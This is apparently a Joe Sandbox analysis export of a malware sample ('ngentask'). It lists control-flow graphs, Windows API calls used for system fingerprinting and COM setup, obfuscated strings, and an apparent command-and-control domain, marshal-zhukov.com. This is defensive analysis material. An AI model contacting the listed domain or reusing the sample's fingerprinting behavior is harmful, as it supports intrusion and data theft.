                                                                                                                      execution_graph 19106 439e03 19107 439e30 19106->19107 19107->19107 19108 439e5d SysAllocString 19107->19108 19109 439ef0 19108->19109 19109->19109 19110 439f17 SysAllocString 19109->19110 19112 439f3a 19110->19112 19111 439fc7 VariantInit 19123 43a030 19111->19123 19112->19111 19113 43a2df SysFreeString SysFreeString 19112->19113 19114 43a2eb SysFreeString SysFreeString 19112->19114 19115 43a232 VariantClear 19112->19115 19116 43a334 19112->19116 19112->19123 19127 43a2be 19112->19127 19113->19114 19114->19127 19115->19123 19130 43d3c0 19116->19130 19121 43a265 SysFreeString 19121->19123 19122 43a39e 19125 43a3c0 19122->19125 19122->19127 19135 43d820 19122->19135 19139 43d6c0 19122->19139 19143 43d8c0 19122->19143 19123->19113 19123->19114 19123->19115 19123->19116 19123->19121 19123->19122 19124 43a29d GetVolumeInformationW 19123->19124 19123->19125 19123->19127 19124->19116 19124->19122 19124->19123 19124->19125 19124->19127 19125->19127 19133 440600 LdrInitializeThunk 19125->19133 19126 43a342 19126->19122 19134 440600 LdrInitializeThunk 19126->19134 19131 43d3e0 19130->19131 19131->19131 19132 43d411 RtlAllocateHeap 19131->19132 19132->19126 19133->19127 19134->19122 19136 43d88e 19135->19136 19137 43d82f 19135->19137 19136->19122 19137->19136 19151 440600 LdrInitializeThunk 19137->19151 19140 43d77e 19139->19140 19141 43d6d2 19139->19141 19140->19122 19141->19140 19152 440600 LdrInitializeThunk 19141->19152 19144 43d942 19143->19144 19145 43d8d6 19143->19145 19144->19122 19145->19144 19148 43d93e 19145->19148 19153 440600 LdrInitializeThunk 19145->19153 19147 43da2e 19147->19144 19147->19147 19155 440600 LdrInitializeThunk 19147->19155 19148->19147 19154 440600 LdrInitializeThunk 19148->19154 19151->19136 19152->19140 19153->19148 19154->19147 19155->19144 19174 40d330 19176 40d33c 19174->19176 19175 40d596 ExitProcess 19176->19175 19177 40d55f 19176->19177 19181 40d546 ShellExecuteW 19176->19181 19178 40d591 19177->19178 19179 40d568 GetCurrentThreadId GetInputState 19177->19179 19197 440550 19178->19197 19182 40d578 GetCurrentProcessId 19179->19182 19183 40d57e 19179->19183 19181->19177 19182->19183 19183->19178 19187 411210 CoInitialize 19183->19187 19188 411231 CoInitializeSecurity 19187->19188 19189 41139d 19187->19189 19188->19189 19190 411253 19188->19190 19191 41250a CoUninitialize 19189->19191 19200 439bf0 19190->19200 19193 40d58c 19191->19193 19196 40fe50 FreeLibrary 19193->19196 19196->19178 19205 441820 19197->19205 19199 440555 FreeLibrary 19199->19175 19203 439c60 19200->19203 19201 439caa 19204 439cbe CoCreateInstance 19201->19204 19202 439cf0 CoCreateInstance 19202->19203 19203->19201 19203->19202 19203->19203 19203->19204 19204->19202 19206 441829 19205->19206 19206->19199 19156 43d442 19157 43d4c2 19156->19157 19158 43d450 RtlFreeHeap 19156->19158 19158->19157 19160 443880 19161 4438a0 19160->19161 19161->19161 19162 4439de 19161->19162 19164 440600 LdrInitializeThunk 19161->19164 19164->19162 19207 440570 19208 44058a 19207->19208 19209 4405d9 19207->19209 19211 4405e4 19207->19211 19208->19211 19212 4405c4 RtlReAllocateHeap 19208->19212 19210 43d3c0 RtlAllocateHeap 19209->19210 19213 4405df 19210->19213 19212->19211 19165 439d4b 19166 439d90 19165->19166 19166->19166 19167 439da6 SysAllocString 19166->19167 19168 439dcf 19167->19168 19169 44082d 19170 440880 19169->19170 19171 440d28 19170->19171 19173 440600 LdrInitializeThunk 19170->19173 19173->19171 19219 44101e 19221 440f8d 19219->19221 19220 441076 19221->19219 19221->19220 19224 440600 LdrInitializeThunk 19221->19224 19223 441097 19224->19223 19225 439ddf CoSetProxyBlanket 19226 440719 19227 440730 19226->19227 19227->19227 19228 4407e4 GetForegroundWindow 19227->19228 19229 4407f2 19228->19229

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 439e03-439e22 1 439e30-439e5b 0->1 1->1 2 439e5d-439ee7 SysAllocString 1->2 3 439ef0-439f15 2->3 3->3 4 439f17-439f3f SysAllocString 3->4 6 43a243-43a251 4->6 7 439f80-439f9c 4->7 8 43a180 4->8 9 439fc7-43a022 VariantInit 4->9 10 43a207-43a20d call 40cbe0 4->10 11 439f46-439f4a 4->11 12 43a2c6-43a2d8 4->12 13 43a186-43a192 4->13 14 43a14c-43a155 4->14 15 43a110-43a145 4->15 16 43a210-43a216 call 40cbe0 4->16 17 43a097-43a0ab 4->17 18 439f54 4->18 19 43a25b-43a2b7 SysFreeString call 442e20 GetVolumeInformationW 4->19 20 439f5a-439f7a 4->20 21 43a199 4->21 22 43a21f-43a224 4->22 23 43a2df-43a2e9 SysFreeString * 2 4->23 24 43a15c 4->24 25 43a19c-43a1bd call 432bd0 4->25 26 43a1e0-43a1ed 4->26 27 439fa6-439fc0 4->27 28 43a2eb-43a2f5 SysFreeString * 2 4->28 29 43a169 4->29 30 43a232-43a23f VariantClear 4->30 31 43a230 4->31 32 43a170-43a179 4->32 33 43a1f4-43a200 4->33 34 43a2be-43a2c5 4->34 6->19 51 439fa0 7->51 8->13 45 43a030-43a066 9->45 10->16 11->18 12->8 12->13 12->21 12->23 12->25 12->26 12->32 12->33 12->34 35 43a4c2 12->35 36 43a561-43a575 call 43d8c0 12->36 37 43a3c0-43a3d6 call 43d430 12->37 38 43a500-43a52d call 43d6a0 12->38 39 43a4a0-43a4bb call 43d820 12->39 40 43a4c8-43a4f5 call 43d6a0 12->40 41 43a32d-43a32f 12->41 42 43a533-43a55a call 43d6c0 12->42 43 43a334-43a354 call 43d3c0 12->43 44 43a47b-43a48e 12->44 13->21 13->25 13->26 13->33 13->35 13->36 13->37 13->38 13->39 13->40 13->41 13->42 13->43 13->44 14->8 14->10 14->12 14->13 14->14 14->15 14->16 14->19 14->21 14->22 14->23 14->24 14->25 14->26 14->28 14->29 14->30 14->31 14->32 14->33 14->34 14->35 14->37 14->38 14->39 14->40 14->41 14->42 14->43 14->44 15->8 15->10 15->12 15->13 15->14 15->16 15->19 15->21 15->22 15->23 15->24 15->25 15->26 15->28 15->29 15->30 15->31 15->32 15->33 15->34 15->35 15->37 15->38 15->40 15->41 15->43 15->44 16->22 46 43a0e1-43a109 call 40cbd0 call 429b10 17->46 47 43a0ad-43a0b2 17->47 18->20 19->8 19->12 19->13 19->21 19->25 19->26 19->32 19->33 19->34 19->35 19->36 19->37 19->38 19->39 19->40 19->41 19->42 19->43 19->44 20->7 21->25 22->31 23->28 24->29 76 43a1c0-43a1c8 25->76 26->26 26->33 26->35 26->36 26->37 26->38 26->39 26->40 26->41 26->42 26->43 26->44 27->6 27->8 27->9 27->10 27->12 27->13 27->14 27->15 27->16 27->17 27->19 27->21 27->22 27->23 27->24 27->25 27->26 27->28 27->29 27->30 27->31 27->32 27->33 27->34 27->41 27->43 28->41 29->32 30->6 31->30 32->8 32->13 32->21 32->25 32->26 32->33 32->35 32->36 32->37 32->38 32->39 32->40 32->41 32->42 32->43 32->44 33->8 33->10 33->13 33->21 33->25 33->26 33->32 33->33 33->34 33->35 33->36 33->37 33->38 33->39 33->40 33->41 33->42 33->43 33->44 36->39 87 43a3e0-43a3f2 37->87 38->42 39->35 39->36 39->37 39->38 39->40 39->42 40->38 58 43a440-43a447 41->58 42->36 42->39 85 43a360-43a372 43->85 44->35 44->36 44->37 44->38 44->39 44->40 44->42 45->45 54 43a068-43a076 45->54 46->8 46->10 46->12 46->13 46->14 46->15 46->16 46->19 46->21 46->22 46->23 46->24 46->25 46->26 46->28 46->29 46->30 46->31 46->32 46->33 46->34 46->35 46->37 46->41 46->43 46->44 56 43a0c0-43a0c4 47->56 51->27 80 43a07a-43a090 54->80 72 43a0c6-43a0cf 56->72 73 43a0b4 56->73 82 43a0d1-43a0d4 72->82 83 43a0d6-43a0da 72->83 81 43a0b5-43a0be 73->81 76->76 86 43a1ca-43a1d4 76->86 80->8 80->10 80->12 80->13 80->14 80->15 80->16 80->17 80->19 80->21 80->22 80->23 80->24 80->25 80->26 80->28 80->29 80->30 80->31 80->32 80->33 80->34 80->37 80->41 80->43 81->46 81->56 82->81 83->81 89 43a0dc-43a0df 83->89 85->85 91 43a374-43a37f 85->91 86->26 86->33 86->35 86->36 86->37 86->38 86->39 86->40 86->41 86->42 86->43 86->44 87->87 92 43a3f4-43a3fc 87->92 89->81 94 43a381-43a389 91->94 95 43a3ac-43a3b9 91->95 96 43a43a-43a43e 92->96 97 43a3fe-43a409 92->97 99 43a390-43a397 94->99 95->35 95->36 95->37 95->38 95->39 95->40 95->42 95->44 96->58 100 43a410-43a417 97->100 101 43a3a0-43a3a6 99->101 102 43a399-43a39c 99->102 103 43a420-43a426 100->103 104 43a419-43a41c 100->104 101->95 106 43a448-43a474 call 440600 101->106 102->99 105 43a39e 102->105 103->96 108 43a428-43a437 call 440600 103->108 104->100 107 43a41e 104->107 105->95 106->35 106->36 106->37 106->38 106->39 106->40 106->42 106->44 107->96 108->96
                                                                                                                      APIs
                                                                                                                      • SysAllocString.OLEAUT32(8FDF8923), ref: 00439E62
                                                                                                                      • SysAllocString.OLEAUT32(8FDF8923), ref: 00439F18
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString
                                                                                                                      • String ID: "_kQ$1[!]$9k?m$bS3U$hKpM$i?y1$i?y1$l3u5$lo$q7bI
                                                                                                                      • API String ID: 2525500382-2291679449
                                                                                                                      • Opcode ID: 3f84ddf9d68db4cfd429c7386c9fa6934f0b9a5841c78f71d6627337152d25ec
                                                                                                                      • Instruction ID: 0f33f5176dd057a132bed2c5aac49cb092b48a7f49199e5d7c126567dc2015bb
                                                                                                                      • Opcode Fuzzy Hash: 3f84ddf9d68db4cfd429c7386c9fa6934f0b9a5841c78f71d6627337152d25ec
                                                                                                                      • Instruction Fuzzy Hash: B302ED79A08300DFD3049F24E885B6BB7E5FFCA315F14882DF4858B291D779A81ACB56

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 113 411210-41122a CoInitialize 114 411231-41124c CoInitializeSecurity 113->114 115 4113b0 113->115 116 41139d-4113a2 113->116 117 411253-411279 call 439bf0 114->117 118 4113b2 114->118 115->118 116->115 123 411280-4112c7 117->123 119 41250a-412510 CoUninitialize 118->119 122 412512-412519 119->122 123->123 124 4112c9-41133b 123->124 125 411340-41136b 124->125 125->125 126 41136d-41137e 125->126 127 411380-41138f 126->127 128 4113b7-4113bb 126->128 130 411390-411399 127->130 129 4113bf-4113c7 128->129 131 4113c9-4113ca 129->131 132 4113db-4113e8 129->132 130->130 133 41139b 130->133 134 4113d0-4113d9 131->134 135 41140b-411413 132->135 136 4113ea-4113f1 132->136 133->129 134->132 134->134 138 411415-411416 135->138 139 41142b-411569 135->139 137 411400-411409 136->137 137->135 137->137 140 411420-411429 138->140 141 411570-4115c8 139->141 140->139 140->140 141->141 142 4115ca-4115ff 141->142 143 411600-411631 142->143 143->143 144 411633-411674 call 40fe60 143->144 147 411700 144->147 148 411710-411719 call 403d70 144->148 149 411702-411709 144->149 150 411684-4116ac GetSystemDirectoryW 144->150 151 41167b-41167d 144->151 147->149 148->119 149->118 149->147 149->148 149->149 149->150 149->151 153 4116b3 150->153 154 4116ae-4116b1 150->154 151->150 156 4116b4-4116bc 153->156 154->153 154->156 157 4116c3 156->157 158 4116be-4116c1 156->158 159 4116c4-4116f4 call 40cbd0 call 43a6b0 call 43d430 157->159 158->157 158->159 159->147
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00411221
                                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411243
                                                                                                                      • CoUninitialize.COMBASE ref: 0041250A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize$SecurityUninitialize
                                                                                                                      • String ID: '676$2 />$2,/&$6910431D5D6F41B70608286674507D91$N967$dc$marshal-zhukov.com$uy
                                                                                                                      • API String ID: 3757020523-386217003
                                                                                                                      • Opcode ID: 7b7ab738a5cf8cdd31bd884001b1d08f61c0211879b15022554c4b45fb3b2319
                                                                                                                      • Instruction ID: a48284d29e9631185903a87ed17f6b227f394860366b5a2ac340633ba54a95c6
                                                                                                                      • Opcode Fuzzy Hash: 7b7ab738a5cf8cdd31bd884001b1d08f61c0211879b15022554c4b45fb3b2319
                                                                                                                      • Instruction Fuzzy Hash: 29C1E0B564C3919BD370CF259881BDBBBE1EB96310F18892DD4D88B392D7394806CB96

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 166 40f882-40faaf 167 40fab0-40fac7 166->167 167->167 168 40fac9-40fad4 167->168 169 40fad7-40fade 168->169 170 40fca0-40fcb2 169->170 171 40fba1-40fba7 169->171 172 40fae5-40fae9 169->172 173 40fba9-40fbbf 169->173 174 40fc7b-40fc99 169->174 175 40fcbb 169->175 176 40fcfc 169->176 177 40fcdd-40fce9 169->177 178 40faee-40fb87 call 40cb30 169->178 179 40fb8e-40fb9a 169->179 170->175 180 40fbe8-40fc08 171->180 182 40fceb-40fcf4 172->182 181 40fbc0-40fbe2 173->181 174->170 174->175 175->177 177->182 178->170 178->171 178->173 178->174 178->175 178->176 178->177 178->179 179->170 179->171 179->173 179->174 179->175 179->176 187 40fc10-40fc51 180->187 181->181 185 40fbe4-40fbe6 181->185 182->176 185->180 187->187 190 40fc53-40fc74 187->190 190->170 190->174 190->175 190->176
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5C1A$A?=$FsOq$G+)$PG8E$UwOu$W/[-$Y3G1$]kQi$`_l]$a7]5$dS`Q$l[zY$sKuI
                                                                                                                      • API String ID: 0-3170360268
                                                                                                                      • Opcode ID: 01935e236d4e2d5ca6a53654527dfc5a5fb418dcb0cdf122a0998de2afce7c2b
                                                                                                                      • Instruction ID: 0c74cb9e6d9683c85258a1eaff13ec23cf88813475e3750d48fb34ca779fcadf
                                                                                                                      • Opcode Fuzzy Hash: 01935e236d4e2d5ca6a53654527dfc5a5fb418dcb0cdf122a0998de2afce7c2b
                                                                                                                      • Instruction Fuzzy Hash: 23B154B5100B40CFE324CF25C89279BBBE2FB55314F148A2CE5AB8B690DB74A446CF45

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 193 40d330-40d33e call 43ee60 196 40d344-40d35f 193->196 197 40d596-40d598 ExitProcess 193->197 198 40d360-40d382 196->198 198->198 199 40d384-40d404 198->199 200 40d410-40d45a 199->200 200->200 201 40d45c-40d46f 200->201 202 40d475-40d4b6 201->202 203 40d55f-40d566 call 437570 201->203 204 40d4c0-40d4f3 202->204 209 40d591 call 440550 203->209 210 40d568-40d576 GetCurrentThreadId GetInputState 203->210 204->204 206 40d4f5-40d51f 204->206 208 40d520-40d544 206->208 208->208 212 40d546-40d559 ShellExecuteW 208->212 209->197 213 40d578 GetCurrentProcessId 210->213 214 40d57e-40d585 call 40e520 210->214 212->203 213->214 214->209 217 40d587 call 411210 214->217 219 40d58c call 40fe50 217->219 219->209
                                                                                                                      APIs
                                                                                                                      • ShellExecuteW.SHELL32(00000000,19AA1BAD,004473DA,?,00000000,00000005), ref: 0040D559
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040D568
                                                                                                                      • GetInputState.USER32 ref: 0040D56E
                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0040D578
                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D598
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$ExecuteExitInputShellStateThread
                                                                                                                      • String ID: /KjM$@C$dc$}O+A
                                                                                                                      • API String ID: 288744916-4249039376
                                                                                                                      • Opcode ID: 325933621e40d8b8d9436bdf2174ccf44da36203a8cf2298e4bcc684bfa02207
                                                                                                                      • Instruction ID: b0541360ae2b64190384122f8a4b8c1e9bcb0c968cf5f3129e2bd2afac22441e
                                                                                                                      • Opcode Fuzzy Hash: 325933621e40d8b8d9436bdf2174ccf44da36203a8cf2298e4bcc684bfa02207
                                                                                                                      • Instruction Fuzzy Hash: 6E516571A5C3005BD30CDF65CC5576BBAE29BC5708F04D87DA685DB2C1EB7888068B8A

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 230 439bf0-439c54 231 439c60-439c85 230->231 231->231 232 439c87-439ca3 231->232 234 439cb0 232->234 235 439cf0-439d33 CoCreateInstance 232->235 236 439caa 232->236 237 439d3f-439d44 232->237 238 439cbe-439ce7 CoCreateInstance 232->238 234->238 235->237 236->234 237->234 237->235 237->236 237->237 237->238 238->235
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5202720c2f036047dc9b756f8f30debdf675b11aadd7bbad5fdf7d6fa87505eb
                                                                                                                      • Instruction ID: 99db50029e9be6752580d46d303db5ca9f103b376aad5169e6ee161556f02837
                                                                                                                      • Opcode Fuzzy Hash: 5202720c2f036047dc9b756f8f30debdf675b11aadd7bbad5fdf7d6fa87505eb
                                                                                                                      • Instruction Fuzzy Hash: 62316474158740AFF3008F55D948B4BBBE4EB86B05F10892DF694AA290C7B99908CF9B

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 269 440600-440632 LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      • LdrInitializeThunk.NTDLL(00443BA2,005C003F,00000002,00000018,?), ref: 0044062E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                      • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                      • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                      • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 271 44082d-440873 272 440880-4408b0 271->272 272->272 273 4408b2-4408be 272->273 274 4408c0-4408c4 273->274 275 4408e1-440c4b call 43ec00 273->275 277 4408d0-4408df 274->277 280 440c61-440cc5 275->280 281 440c4d 275->281 277->275 277->277 283 440cd0-440cf5 280->283 282 440c50-440c5f 281->282 282->280 282->282 283->283 284 440cf7-440d02 283->284 285 440d04-440d0f 284->285 286 440d4f-440d68 284->286 287 440d10-440d17 285->287 288 440d19-440d26 287->288 289 440d2a-440d30 287->289 288->287 290 440d28 288->290 289->286 291 440d32-440d47 call 440600 289->291 290->286 293 440d4c 291->293 293->286
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      • Opcode ID: 328e5bc532d5bb4fb304c21ed20fbd052a0cae81ad7fa653924ff17c9a6d0f18
                                                                                                                      • Instruction ID: 678d0e188adab1d5500fadea400446abedbc663d0db3939ff0fd71b1963abac5
                                                                                                                      • Opcode Fuzzy Hash: 328e5bc532d5bb4fb304c21ed20fbd052a0cae81ad7fa653924ff17c9a6d0f18
                                                                                                                      • Instruction Fuzzy Hash: F041F0745083428BE708DF14C49126BB7F2FFC6304F14491EE1C18B2A0E779C91ACB9A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 01
                                                                                                                      • API String ID: 0-3477152822
                                                                                                                      • Opcode ID: 99af49e7e6929860ae38d849f9117ce2c28b81cedbf8253e612d591faa750a2a
                                                                                                                      • Instruction ID: 78b3c5e0676231c38cd4605f4b388ec8c79a0720ff071878e1746d55816391af
                                                                                                                      • Opcode Fuzzy Hash: 99af49e7e6929860ae38d849f9117ce2c28b81cedbf8253e612d591faa750a2a
                                                                                                                      • Instruction Fuzzy Hash: 4B31CB741183419BE714CF25C890ABBB7F0FF86708F04891CF9869B290EB748945CB5A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cd532eb7a17253d19b88c1acda108e62323a713565142c17b70a4033e7d8cfdd
                                                                                                                      • Instruction ID: 3fecb3c509470740bee7bdbf72550d9fe83e400ddcc0ba0c7b2fb13a490dde12
                                                                                                                      • Opcode Fuzzy Hash: cd532eb7a17253d19b88c1acda108e62323a713565142c17b70a4033e7d8cfdd
                                                                                                                      • Instruction Fuzzy Hash: 61112C3460864157F3115B24CC45737B7D2EB9B725F64582FE184973A1C37DC885C75A

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 239 43d442-43d449 240 43d4c2-43d4c8 239->240 241 43d450-43d46a 239->241 242 43d470-43d499 241->242 242->242 243 43d49b-43d4b2 RtlFreeHeap 242->243 243->240
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000), ref: 0043D4A7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: ccc46a3820b10345fc24cd63001c7ab07fbaf0123408abc039a2ae43fef11ea0
                                                                                                                      • Instruction ID: 1c16604aae1155129467535911cc151fb7d307c800175087f761eb098441637a
                                                                                                                      • Opcode Fuzzy Hash: ccc46a3820b10345fc24cd63001c7ab07fbaf0123408abc039a2ae43fef11ea0
                                                                                                                      • Instruction Fuzzy Hash: 3AF0223A3563508BD3048BA8ECA076A7B92DFDA719F28817DD5C48B6A1C7B59811C382

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 244 440570-440583 245 4405e4-4405ed call 43d430 244->245 246 440598-4405a9 244->246 247 4405d9-4405e3 call 43d3c0 244->247 248 44058a-440591 244->248 255 4405ef-4405f3 245->255 249 4405b0-4405c2 246->249 248->245 248->246 249->249 252 4405c4-4405d7 RtlReAllocateHeap 249->252 252->255
                                                                                                                      APIs
                                                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 004405D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: f02fbea22e2f1fecda0fbe97150a80e4dce3797cd52e50948bf4926b8f36c52f
                                                                                                                      • Instruction ID: 9f33d7cd772fb8c8d349ea5c543c91de8ed9321a1ce8ce1756a76ed8757ee429
                                                                                                                      • Opcode Fuzzy Hash: f02fbea22e2f1fecda0fbe97150a80e4dce3797cd52e50948bf4926b8f36c52f
                                                                                                                      • Instruction Fuzzy Hash: AC0178B0B093018BE3149F35FD5672B37A6EBD9301F08993CE5C042201DB39A86ADA52

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 256 439d4b-439d84 257 439d90-439da4 256->257 257->257 258 439da6-439dcb SysAllocString 257->258 259 439dcf-439dd4 258->259
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2525500382-0
                                                                                                                      • Opcode ID: 466cf1c0b300e9601f0207c7ac9956b4fca475642fe190e5ad588be647a22d04
                                                                                                                      • Instruction ID: ea566c1fd506d3c3c4a31fb516f702cb4fc5e1c4ed8b9d2d4bc3451663e8c17f
                                                                                                                      • Opcode Fuzzy Hash: 466cf1c0b300e9601f0207c7ac9956b4fca475642fe190e5ad588be647a22d04
                                                                                                                      • Instruction Fuzzy Hash: 100128740083419FD250CF2A9918A1FBBF4EBD6724F108E1CF0D99B292D7749506CF86

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 260 43d3c0-43d3d2 261 43d3e0-43d40f 260->261 261->261 262 43d411-43d427 RtlAllocateHeap 261->262
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,?,080B0A0D,0044445F,?), ref: 0043D41D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 143eb64a3b55460c315d82f57733e4fa82a727e942247282b2b0d6e3ab2a6114
                                                                                                                      • Instruction ID: 5c90e11579244bbd2ace7ce541f9c3816f34a726410f7e311f42a6b46214092b
                                                                                                                      • Opcode Fuzzy Hash: 143eb64a3b55460c315d82f57733e4fa82a727e942247282b2b0d6e3ab2a6114
                                                                                                                      • Instruction Fuzzy Hash: AAF020B290C2208BD314DA24BC60F2B7B95CFA5310F0581BCE88657392C5340C62CA82

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 263 440719-44072b 264 440730-440758 263->264 264->264 265 44075a-4407ed GetForegroundWindow call 443680 264->265 268 4407f2-440815 265->268
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 004407E4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
